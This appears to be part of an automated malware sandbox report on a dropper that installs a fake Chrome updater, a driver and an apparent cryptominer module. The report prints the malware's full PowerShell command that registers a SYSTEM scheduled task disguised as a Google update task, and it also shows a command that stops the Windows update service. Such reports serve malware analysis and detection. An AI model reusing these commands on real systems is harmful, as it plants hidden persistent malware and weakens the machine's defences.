Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0040B895 push ecx; ret	3_2_0040B8A8
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00408FD9 push ecx; ret	3_2_00408FEC
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0083198B push ebx; iretd	3_2_008319B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00831970 push ebx; iretd	3_2_008319B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00831977 push ebx; iretd	3_2_008319B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0095E1A3 pushad ; iretd	3_2_0095E1A9
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00959317 push ebx; iretd	3_2_00959342
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00959302 push ebx; iretd	3_2_00959342
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 5_2_02B6FC85 pushad ; ret	5_2_02B6FC97
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 5_2_02B6FD61 pushad ; ret	5_2_02B6FD88
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 5_2_02B6D16B pushfd ; ret	5_2_02B6D1B3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_004011D0 push ebx; iretd	9_2_00401217
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_004011D7 push ebx; iretd	9_2_00401217
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_004011EB push ebx; iretd	9_2_00401217
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 17_2_02B1AC85 pushad ; ret	17_2_02B1AC97
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 17_2_02B1AD61 pushad ; ret	17_2_02B1AD88
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 17_2_02B1816B pushfd ; ret	17_2_02B181B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD3477D2A5 pushad ; iretd	26_2_00007FFD3477D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD34893A36 pushad ; ret	26_2_00007FFD34893AC9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD34893A79 pushad ; ret	26_2_00007FFD34893AC9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD348922C5 push eax; iretd	26_2_00007FFD3489233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD34897B8B push eax; ret	26_2_00007FFD34897B99
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A5198B push ebx; iretd	57_2_00A519B7
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A51977 push ebx; iretd	57_2_00A519B7
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A51970 push ebx; iretd	57_2_00A519B7
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A8E0D3 pushad ; iretd	57_2_00A8E0D9
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A89232 push ebx; iretd	57_2_00A89272
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A89247 push ebx; iretd	57_2_00A89272
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_004011D0 push ebx; iretd	59_2_00401217
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_004011D7 push ebx; iretd	59_2_00401217
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_004011EB push ebx; iretd	59_2_00401217

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 3_2_004124B2 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

3_2_004124B2

Source: latestX.exe.0.dr	Static PE information: section name: .xdata
Source: Broom.exe.2.dr	Static PE information: section name: .didata
Source: updater.exe.6.dr	Static PE information: section name: .xdata
Source: whxcdqscjswq.tmp.39.dr	Static PE information: section name: _RANDOMX
Source: whxcdqscjswq.tmp.39.dr	Static PE information: section name: _TEXT_CN
Source: whxcdqscjswq.tmp.39.dr	Static PE information: section name: _TEXT_CN
Source: whxcdqscjswq.tmp.39.dr	Static PE information: section name: _RDATA

Source: e0cbefcb1af40c7d4aff4aca26621a98.exe.0.dr	Static PE information: real checksum: 0x42e75a should be: 0x43417d
Source: updater.exe.6.dr	Static PE information: real checksum: 0x59d840 should be: 0x5a15bb
Source: latestX.exe.0.dr	Static PE information: real checksum: 0x59d840 should be: 0x5a15bb
Source: Broom.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x55278a
Source: InstallSetup5.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x28f890
Source: whxcdqscjswq.tmp.39.dr	Static PE information: real checksum: 0x0 should be: 0x554c2a

Source: initial sample	Static PE information: section name: .text entropy: 7.3194322773212415
Source: initial sample	Static PE information: section name: .text entropy: 7.3194322773212415

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\cdttvvc

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\latestX.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\cdttvvc	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\whxcdqscjswq.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	File created: C:\Users\user\AppData\Local\Temp\Broom.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\Temp\whxcdqscjswq.tmp

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,

3_2_00429C40

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\cdttvvc:Zone.Identifier read attributes | delete

Found hidden mapped module (file has been removed from disk)

Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WHXCDQSCJSWQ.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WHXCDQSCJSWQ.TMP

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

3_2_00429C40

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
